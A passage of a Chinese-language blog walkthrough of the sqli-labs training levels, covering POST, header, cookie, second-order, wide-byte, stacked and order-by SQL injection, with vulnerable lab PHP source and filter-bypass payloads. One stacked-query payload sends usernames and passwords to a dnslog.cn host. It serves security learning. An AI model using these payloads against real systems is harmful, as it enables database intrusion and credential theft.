'<font size="3" color="#0000ff">';</span><br><span class="line"> echo "<br>";</span><br><span class="line"> echo 'Your Login name:'. $row['username'];</span><br><span class="line"> echo "<br>";</span><br><span class="line"> echo 'Your Password:' .$row['password'];</span><br><span class="line"> echo "<br>";</span><br><span class="line"> echo "</font>";</span><br><span class="line"> echo "<br>";</span><br><span class="line"> echo "<br>";</span><br><span class="line"> echo '<img src="../images/flag.jpg" />';</span><br><span class="line"> /又是这里分成两部分,上面是正确回显</span><br><span class="line"> 下面是报错回显</span><br><span class="line"> echo "</font>";</span><br><span class="line"> }</span><br><span class="line"> else</span><br><span class="line"> {</span><br><span class="line"> echo '<font color= "#0000ff" font size="3">';</span><br><span class="line"> //echo "Try again looser";</span><br><span class="line"> print_r(mysql_error());</span><br><span class="line"> echo "</br>";</span><br><span class="line"> echo "</br>";</span><br><span class="line"> echo "</br>";</span><br><span class="line"> echo '<img src="../images/slap.jpg" />';</span><br><span class="line"> echo "</font>";</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">?></span><br></pre></td></tr></table></figure>
<h4 id="post传参"><a href="#post传参" class="headerlink" title="post传参"></a><code>post传参</code></h4><p>post 传参有很多方式最本质的就是在输入框传<br>然后是一些插件具有传参功能 hackbar 他们一般需要配合抓包的插件使用<br>较多的是一些抓包软件,burpsuit 等<br>他们既有抓包功能,也有重发器,测试器功能强大</p>
<h4 id="注入语句"><a href="#注入语句" class="headerlink" title="注入语句"></a><code>注入语句</code></h4><p>和 get 传参类型的语句大体相同,不同的地方有原来的 id=1’由于 get 传参,抓包后自动写入 uname/password=所以只需要写后面的 admin’ 加上 sql 执行语句,原理一样,都是让系统执行完传参后继续把 sql 语句执行来回显 这里末尾注释符可用#</p>
<h3 id="实操-1"><a href="#实操-1" class="headerlink" title="实操"></a>实操</h3><p>post 传参同样有三大类</p>
<h4 id="正误回显都有"><a href="#正误回显都有" class="headerlink" title="正误回显都有"></a>正误回显都有</h4><p>在 burpsuit 重发器里传参,<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254138419-80.png" alt="在这里插入图片描述"><br>红字部分即为注入语句,这里同样只展示最后一步 其他可按照 get 传参原理<br>只需改动小部分</p>
<h4 id="没正确回显-有报错回显"><a href="#没正确回显-有报错回显" class="headerlink" title="没正确回显 有报错回显"></a>没正确回显 有报错回显</h4><p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254140293-83.png" alt="在这里插入图片描述">这里我采用了辨识度更高的时间盲注 布尔盲注同样使用</p>
<h4 id="正错回显都没有"><a href="#正错回显都没有" class="headerlink" title="正错回显都没有"></a>正错回显都没有</h4><p>同上面直接时间盲注</p>
<h2 id="基于报错注入的各种传参方式"><a href="#基于报错注入的各种传参方式" class="headerlink" title="基于报错注入的各种传参方式"></a>基于报错注入的各种传参方式</h2><h3 id="先讲报错注入"><a href="#先讲报错注入" class="headerlink" title="先讲报错注入"></a><code>先讲报错注入</code></h3><h4 id="updatexml"><a href="#updatexml" class="headerlink" title="updatexml"></a>updatexml</h4><p>updatexml (XML_document, XPath_string, new_value)<br>替换查找到的符合条件的数据</p>
<h4 id="extactvalue"><a href="#extactvalue" class="headerlink" title="extactvalue"></a>extactvalue</h4><p>extractvalue(XML_document, XPath_string)<br>对 XML 文档进行查询的函数<br>当上述两个函数的 xpath 路径出错时,将 XML_document 报错返回回来<br>注意只能返回 32 个字符,后面的可用 limit 等来限制返回的字符位置</p>
<h3 id="传参方式"><a href="#传参方式" class="headerlink" title="传参方式"></a><code>传参方式</code></h3><p>burp suite 抓包后改相应数据</p>
<h4 id="user-agent-注入"><a href="#user-agent-注入" class="headerlink" title="user-agent 注入"></a>user-agent 注入</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">User</span><span class="operator">-</span>Agent:<span class="string">'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or'</span></span><br></pre></td></tr></table></figure>
<h4 id="referer-注入"><a href="#referer-注入" class="headerlink" title="referer 注入"></a>referer 注入</h4><h4 id="cookie-注入"><a href="#cookie-注入" class="headerlink" title="cookie 注入"></a>cookie 注入</h4><h4 id="base64-加密的-cookie-注入"><a href="#base64-加密的-cookie-注入" class="headerlink" title="base64 加密的 cookie 注入"></a>base64 加密的 cookie 注入</h4><p>将 payload 经 base64 加密后上传即可</p>
<h2 id="过滤注释的GET"><a href="#过滤注释的GET" class="headerlink" title="过滤注释的GET"></a><code>过滤注释的GET</code></h2><p>源码中过滤掉了注释符<br>注释符不能用了所以要在闭合上下功夫</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">?id=<span class="string">' union select 1,group_concat(username),group_concat(password) from users where 1 or '</span><span class="number">1</span><span class="string">' = '</span><span class="number">1</span></span><br><span class="line">?id=-<span class="number">1</span><span class="string">' union select 1,(select group_concat(username) from users),'</span><span class="number">3</span></span><br></pre></td></tr></table></figure>
<p>在末尾构造语句使闭合符号与语句组成一个不影响的语句<br>闭合方式多种多样</p>
<h2 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a><code>二次注入</code></h2><p>首先注册一个用户 admin‘#<br>然后登录<br>修改密码<br>当你修改密码时 后台就执行了</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">UPDATE</span> users <span class="keyword">SET</span> passwd<span class="operator">=</span>"新密码" <span class="keyword">WHERE</span> username <span class="operator">=</span><span class="string">' admin'</span> # <span class="string">' AND password='</span></span><br></pre></td></tr></table></figure>
<p>也就是<br>你用 admin’#用户把 admin 用户的密码给改了</p>
<h2 id="过滤"><a href="#过滤" class="headerlink" title="过滤"></a><code>过滤</code></h2><h3 id="过滤-or-和-and"><a href="#过滤-or-和-and" class="headerlink" title="过滤 or 和 and"></a>过滤 or 和 and</h3><p>将 payload 里所有 and 和 or<br>替换为 anandd 和 oorr<br>这里 password 也要变成 passwoorrd</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">?id=-<span class="number">1</span> union select <span class="number">1</span>,<span class="number">2</span>,<span class="title function_ invoke__">group_concat</span>(<span class="title function_ invoke__">concat_ws</span>(<span class="number">0x7e</span>,username,passwoorrd)) <span class="keyword">from</span> users<span class="comment">#</span></span><br></pre></td></tr></table></figure>
<h3 id="过滤下的报错注入"><a href="#过滤下的报错注入" class="headerlink" title="过滤下的报错注入"></a>过滤下的报错注入</h3><h4 id="26"><a href="#26" class="headerlink" title="26"></a>26</h4><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">'/or/i'</span>,<span class="string">""</span>, <span class="variable">$id</span>); /strip out <span class="title function_ invoke__">OR</span> (non <span class="keyword">case</span> sensitive)</span><br><span class="line"> <span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">'/and/i'</span>,<span class="string">""</span>, <span class="variable">$id</span>); /Strip out <span class="title function_ invoke__">AND</span> (non <span class="keyword">case</span> sensitive)</span><br><span class="line"> <span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">'/[\/\*]/'</span>,<span class="string">""</span>, <span class="variable">$id</span>); /strip out */</span><br><span class="line"> <span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">'/[--]/'</span>,<span class="string">""</span>, <span class="variable">$id</span>); /Strip out --</span><br><span class="line"> <span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">'/[#]/'</span>,<span class="string">""</span>, <span class="variable">$id</span>); /Strip out <span class="comment">#</span></span><br><span class="line"> <span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">'/[\s]/'</span>,<span class="string">""</span>, <span class="variable">$id</span>); /Strip out spaces</span><br><span class="line"> <span class="variable">$id</span>= <span class="title function_ invoke__">preg_replace</span>(<span class="string">'/[\/\\\\]/'</span>,<span class="string">""</span>, <span class="variable">$id</span>); /Strip out slashes</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$id</span>;</span><br></pre></td></tr></table></figure>
<p>要用到||代替 or information 里的 or 要双写,用||‘1’=‘1 来闭合</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">?id=<span class="number">0</span><span class="string">'||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='</span>security<span class="string">'))),1)||'</span><span class="number">1</span><span class="string">'='</span><span class="number">1</span></span><br></pre></td></tr></table></figure>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254143668-86.png" alt="在这里插入图片描述"></p>
<h4 id="27"><a href="#27" class="headerlink" title="27"></a>27</h4><p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254145977-89.png" alt="在这里插入图片描述"></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">?id=<span class="number">0</span><span class="string">'||updatexml(1,concat(0x7e,(SeLect(group_concat(table_name))from(information_schema.tables)where(table_schema='</span>security<span class="string">'))),1)||'</span><span class="number">1</span><span class="string">'='</span><span class="number">1</span></span><br></pre></td></tr></table></figure>
<p>大小写 select 和 union</p>
<h3 id="过滤下的时间盲注"><a href="#过滤下的时间盲注" class="headerlink" title="过滤下的时间盲注"></a>过滤下的时间盲注</h3><p>26 到 27 关的 a 都是无法报错注入的<br>能用时间盲注过滤方法和不带 a 的关一样</p>
<h2 id="waf"><a href="#waf" class="headerlink" title="waf"></a><code>waf</code></h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">/ take the variables</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'id'</span>])){</span><br><span class="line"> <span class="variable">$qs</span> = <span class="variable">$_SERVER</span>[<span class="string">'QUERY_STRING'</span>];</span><br><span class="line"> <span class="variable">$hint</span>=<span class="variable">$qs</span>;</span><br><span class="line"> <span class="variable">$id1</span>=<span class="title function_ invoke__">java_implimentation</span>(<span class="variable">$qs</span>);</span><br><span class="line"> <span class="variable">$id</span>=<span class="variable">$_GET</span>[<span class="string">'id'</span>];</span><br><span class="line"> <span class="comment">//echo $id1;</span></span><br><span class="line"> <span class="title function_ invoke__">whitelist</span>(<span class="variable">$id1</span>);}</span><br><span class="line"></span><br><span class="line">/WAF implimentation with a whitelist approach..... only allows input to be Numeric.</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">whitelist</span>(<span class="params"><span class="variable">$input</span></span>)</span>{</span><br><span class="line"> <span class="variable">$match</span> = <span class="title function_ invoke__">preg_match</span>(<span class="string">"/^\d+$/"</span>, <span class="variable">$input</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$match</span>)</span><br><span class="line"> {<span class="comment">//echo "you are good";</span></span><br><span class="line"> <span class="comment">//return $match;</span></span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {<span class="title function_ invoke__">header</span>(<span class="string">'Location: hacked.php'</span>);</span><br><span class="line"> <span class="comment">//echo "you are bad";</span></span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">/ The <span class="function"><span class="keyword">function</span> <span class="title">below</span> <span class="title">immitates</span> <span class="title">the</span> <span class="title">behavior</span> <span class="title">of</span> <span class="title">parameters</span> <span class="title">when</span> <span class="title">subject</span> <span class="title">to</span> <span class="title">HPP</span> (<span class="params">HTTP Parameter Pollution</span>).</span></span><br><span class="line"><span class="function"><span class="title">function</span> <span class="title">java_implimentation</span>(<span class="params"><span class="variable">$query_string</span></span>)</span>{</span><br><span class="line"> <span class="variable">$q_s</span> = <span class="variable">$query_string</span>;</span><br><span class="line"> <span class="variable">$qs_array</span>= <span class="title function_ invoke__">explode</span>(<span class="string">"&"</span>,<span class="variable">$q_s</span>);</span><br><span class="line"> <span class="keyword">foreach</span>(<span class="variable">$qs_array</span> <span class="keyword">as</span> <span class="variable">$key</span> => <span class="variable">$value</span>){</span><br><span class="line"> <span class="variable">$val</span>=<span class="title function_ invoke__">substr</span>(<span class="variable">$value</span>,<span class="number">0</span>,<span class="number">2</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$val</span>==<span class="string">"id"</span>){</span><br><span class="line"> <span class="variable">$id_value</span>=<span class="title function_ invoke__">substr</span>(<span class="variable">$value</span>,<span class="number">3</span>,<span class="number">30</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$id_value</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>"</span>;</span><br><span class="line"> <span class="keyword">break</span>;}</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>java_implimentation 模拟 tomcat 的查询函数处理<br>whitelist 白名单过滤 检测到不符合规则就重定向<br>漏洞是 whitelist 只检测了 java_implimentation 输出的第一个参数$id_value<br>后面的逃过检测 注入点在后面<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254151996-92.png" alt="在这里插入图片描述" /></p>
<h2 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a><code>宽字节注入</code></h2><p>MySQL 在使用 GBK 编码的时候,会认为两个字符为一个汉字,因为过滤方法主要就是在敏感字符前面添加 反斜杠 \,所以这里想办法干掉反斜杠即可。<br>urlencode(’) = %5c%27,我们在%5c%27 前面添加%df,形 成%df%5c%27,MySQL 在 GBK 编码方式的时候会将两个字节当做一个汉字,这个时候就把%df%5c 当做是一个汉字,%27 则作为一个单独的符号在外面,同时也就达到了我们的目的。<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254154496-95.png" alt="在这里插入图片描述"></p>
<h3 id="结束注释"><a href="#结束注释" class="headerlink" title="结束注释"></a><code>结束注释</code></h3><p>当转译为‘/时可用’/**/来<code>结束注释</code></p>
<h2 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a><code>堆叠注入</code></h2><p>在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。结束一个 sql 语句后继续构造下一条语句,会一起执行 因此产生了堆叠注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间区别在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句<br>堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新 的查询或者终止查询,可以达到修改数据和调用存储过程的目的。这种技术在 SQL 注入中还是比较频繁的。<br>如下展示了堆叠注入插入了一个用户数据</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254157372-98.png" alt="在这里插入图片描述"><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254159693-101.png" alt="在这里插入图片描述">同时也可以进行 dnslog 注入</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">?id=<span class="number">1</span><span class="string">';select load_file(concat('</span><span class="comment">//',(select hex(concat_ws('~',username,password)) from users limit 0,1),'.au0mvd.dnslog.cn/1.txt'));--+</span></span><br></pre></td></tr></table></figure>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254161931-104.png" alt="在这里插入图片描述"></p>
<figure class="highlight css"><table><tr><td class="code"><pre><span class="line">desc查看表结构的详细信息</span><br><span class="line">desc table_name;</span><br><span class="line">此处desc是describe的缩写,用法: desc 表名/查询语句</span><br></pre></td></tr></table></figure>
<p>handler 适用于 select 等过滤</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">handler handler_table <span class="keyword">open</span>;</span><br><span class="line">handler handler_table read <span class="keyword">first</span>;</span><br><span class="line">handler handler_table read next;</span><br><span class="line">……</span><br><span class="line">handler handler_table <span class="keyword">close</span>;</span><br></pre></td></tr></table></figure>
<h2 id="二次注入进阶"><a href="#二次注入进阶" class="headerlink" title="二次注入进阶"></a>二次注入进阶</h2><h3 id="需成功登录才能二次注入"><a href="#需成功登录才能二次注入" class="headerlink" title="需成功登录才能二次注入"></a>需成功登录才能二次注入</h3><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">sqllogin</span>(<span class="params"><span class="variable">$host</span>,<span class="variable">$dbuser</span>,<span class="variable">$dbpass</span>, <span class="variable">$dbname</span></span>)</span>{</span><br><span class="line"> <span class="comment">// connectivity</span></span><br><span class="line"><span class="comment">//mysql connections for stacked query examples.</span></span><br><span class="line"><span class="variable">$con1</span> = <span class="title function_ invoke__">mysqli_connect</span>(<span class="variable">$host</span>,<span class="variable">$dbuser</span>,<span class="variable">$dbpass</span>, <span class="variable">$dbname</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$username</span> = <span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$con1</span>, <span class="variable">$_POST</span>[<span class="string">"login_user"</span>]);</span><br><span class="line"> <span class="variable">$password</span> = <span class="variable">$_POST</span>[<span class="string">"login_password"</span>];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Check connection</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">mysqli_connect_errno</span>(<span class="variable">$con1</span>))</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Failed to connect to MySQL: "</span> . <span class="title function_ invoke__">mysqli_connect_error</span>();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> @<span class="title function_ invoke__">mysqli_select_db</span>(<span class="variable">$con1</span>, <span class="variable">$dbname</span>) <span class="keyword">or</span> <span class="keyword">die</span> ( <span class="string">"Unable to connect to the database ######: "</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">/* execute multi query */</span></span><br><span class="line"> <span class="variable">$sql</span> = <span class="string">"SELECT * FROM users WHERE username='<span class="subst">$username</span>' and password='<span class="subst">$password</span>'"</span>;</span><br><span class="line"> <span class="keyword">if</span> (@<span class="title function_ invoke__">mysqli_multi_query</span>(<span class="variable">$con1</span>, <span class="variable">$sql</span>))</span><br><span class="line"> {</span><br><span class="line"> <span class="comment">/* store first result set */</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$result</span> = @<span class="title function_ invoke__">mysqli_store_result</span>(<span class="variable">$con1</span>))</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$row</span> = @<span class="title function_ invoke__">mysqli_fetch_row</span>(<span class="variable">$result</span>)){</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$row</span>[<span class="number">1</span>]) {</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$row</span>[<span class="number">1</span>];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<font size="5" color= "#FFFF00">'</span>;</span><br><span class="line"> <span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$con1</span>));</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"</font>"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<font size="5" color= "#FFFF00">'</span>;</span><br><span class="line"> <span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$con1</span>));</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"</font>"</span>;</span><br><span class="line"> }</span><br></pre></td></tr></table></figure>
<p>这里对 username 和 password 过滤不强<br>可通过万能密码</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="number">1</span>’ <span class="keyword">or</span> <span class="string">'1'</span>=<span class="string">'1</span></span><br></pre></td></tr></table></figure>
<p>登录<br>接下来通过修改密码界面二次注入</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?</span>PHP</span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_COOKIE</span>[<span class="string">"Auth"</span>])){</span><br><span class="line"> <span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">"username"</span>])) {</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: index.php'</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: index.php'</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">//including the Mysql connect parameters.</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">"../sql-connections/sql-connect.php"</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="comment"># Validating the user input........</span></span><br><span class="line"> <span class="variable">$username</span>= <span class="variable">$_SESSION</span>[<span class="string">"username"</span>];</span><br><span class="line"> <span class="variable">$curr_pass</span>= <span class="title function_ invoke__">mysql_real_escape_string</span>(<span class="variable">$_POST</span>[<span class="string">'current_password'</span>]);<span class="comment">//原密码 还是万能密码绕过</span></span><br><span class="line"> <span class="variable">$pass</span>= <span class="title function_ invoke__">mysql_real_escape_string</span>(<span class="variable">$_POST</span>[<span class="string">'password'</span>]);<span class="comment">//新密码</span></span><br><span class="line"> <span class="variable">$re_pass</span>= <span class="title function_ invoke__">mysql_real_escape_string</span>(<span class="variable">$_POST</span>[<span class="string">'re_password'</span>]);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$pass</span>==<span class="variable">$re_pass</span>){</span><br><span class="line"> <span class="variable">$sql</span> = <span class="string">"UPDATE users SET PASSWORD='<span class="subst">$pass</span>' where username='<span class="subst">$username</span>' and password='<span class="subst">$curr_pass</span>' "</span>;</span><br><span class="line"> <span class="variable">$res</span> = <span class="title function_ invoke__">mysql_query</span>(<span class="variable">$sql</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">'You tried to be smart, Try harder!!!! :( '</span>);</span><br><span class="line"> <span class="variable">$row</span> = <span class="title function_ invoke__">mysql_affected_rows</span>();</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<font size="3" color="#FFFF00">'</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center>'</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$row</span>==<span class="number">1</span>){</span><br><span class="line"> <span class="comment">//echo "Password successfully updated";</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<img src="../images/password-updated.jpg">'</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span>{</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: failed.php'</span>);</span><br><span class="line"> <span class="comment">//echo 'You tried to be smart, Try harder!!!! :( ';</span></span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<font size="5" color="#FFFF00"><center>'</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Make sure New Password and Retype Password fields have same value"</span>;</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'refresh:2, url=index.php'</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit1'</span>]))</span><br><span class="line">{</span><br><span class="line"> <span class="title function_ invoke__">session_destroy</span>();</span><br><span class="line"> <span class="title function_ invoke__">setcookie</span>(<span class="string">'Auth'</span>, <span class="number">1</span> , <span class="title function_ invoke__">time</span>()-<span class="number">3600</span>);</span><br><span class="line"> <span class="title function_ invoke__">header</span> (<span class="string">'Location: index.php'</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>他用户名通过 session 获取,所以无法更改其他用户</p>
<h2 id="order-by注入"><a href="#order-by注入" class="headerlink" title="order by注入"></a><code>order by注入</code></h2><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> users <span class="keyword">ORDER</span> <span class="keyword">BY</span></span><br></pre></td></tr></table></figure>
<p>order by 与 where 差不多<br>但不同是 order by 不能使用 union 联合<br>其他都可 也比较灵活<br>从 46 到 53 关皆为 order by 注入</p>
<h2 id="限制次数的注入"><a href="#限制次数的注入" class="headerlink" title="限制次数的注入"></a>限制次数的注入</h2><p>从 54 关开始,限制了注入次数<br>一旦超过次数就会改变数据<br>一切又要重新开始<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254167926-107.png" alt="在这里插入图片描述"><br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254169537-110.png" alt="在这里插入图片描述"><br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254171849-113.png" alt="在这里插入图片描述"></p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254174456-116.png" alt="在这里插入图片描述">58-62 可以报错注入<br>从 62 关开始只能使用盲注<br><code>id注入部分代码</code></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">id注入部分代码</span><br><span class="line"><span class="comment">//including the Mysql connect parameters.</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">'../sql-connections/sql-connect-1.php'</span>;</span><br><span class="line"><span class="keyword">include</span> <span class="string">'../sql-connections/functions.php'</span>;</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="variable">$pag</span> = <span class="variable">$_SERVER</span>[<span class="string">'PHP_SELF'</span>]; /generating page address to piggy back after redirects...</span><br><span class="line"><span class="variable">$characters</span> = <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'</span>; /characterset <span class="keyword">for</span> generating random data</span><br><span class="line"><span class="variable">$times</span>= <span class="number">10</span>;</span><br><span class="line"><span class="variable">$table</span> = <span class="title function_ invoke__">table_name</span>();</span><br><span class="line"><span class="variable">$col</span> = <span class="title function_ invoke__">column_name</span>(<span class="number">1</span>); / session id column name</span><br><span class="line"><span class="variable">$col1</span> = <span class="title function_ invoke__">column_name</span>(<span class="number">2</span>); /secret key column name</span><br><span class="line">/ Submitting the <span class="keyword">final</span> answer</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'answer_key'</span>])){</span><br><span class="line"> / resetting the challenge <span class="keyword">and</span> repopulating the table .</span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'reset'</span>])){</span><br><span class="line"> <span class="title function_ invoke__">setcookie</span>(<span class="string">'challenge'</span>, <span class="string">' '</span>, <span class="title function_ invoke__">time</span>() - <span class="number">3600000</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<font size=4>You have reset the Challenge</font><br>\n"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Redirecting you to main challenge page..........\n"</span>;</span><br><span class="line"> <span class="title function_ invoke__">header</span>( <span class="string">"refresh:4;url=../sql-connections/setup-db-challenge.php?id=<span class="subst">$pag</span>"</span> );</span><br><span class="line"> <span class="comment">//echo "cookie expired";</span></span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span>{</span><br><span class="line"> / Checking the cookie on the page <span class="keyword">and</span> populate the table with random value.</span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_COOKIE</span>[<span class="string">'challenge'</span>])){</span><br><span class="line"> <span class="variable">$sessid</span>=<span class="variable">$_COOKIE</span>[<span class="string">'challenge'</span>];</span><br><span class="line"> <span class="comment">//echo "Cookie value: ".$sessid;</span></span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$expire</span> = <span class="title function_ invoke__">time</span>()+<span 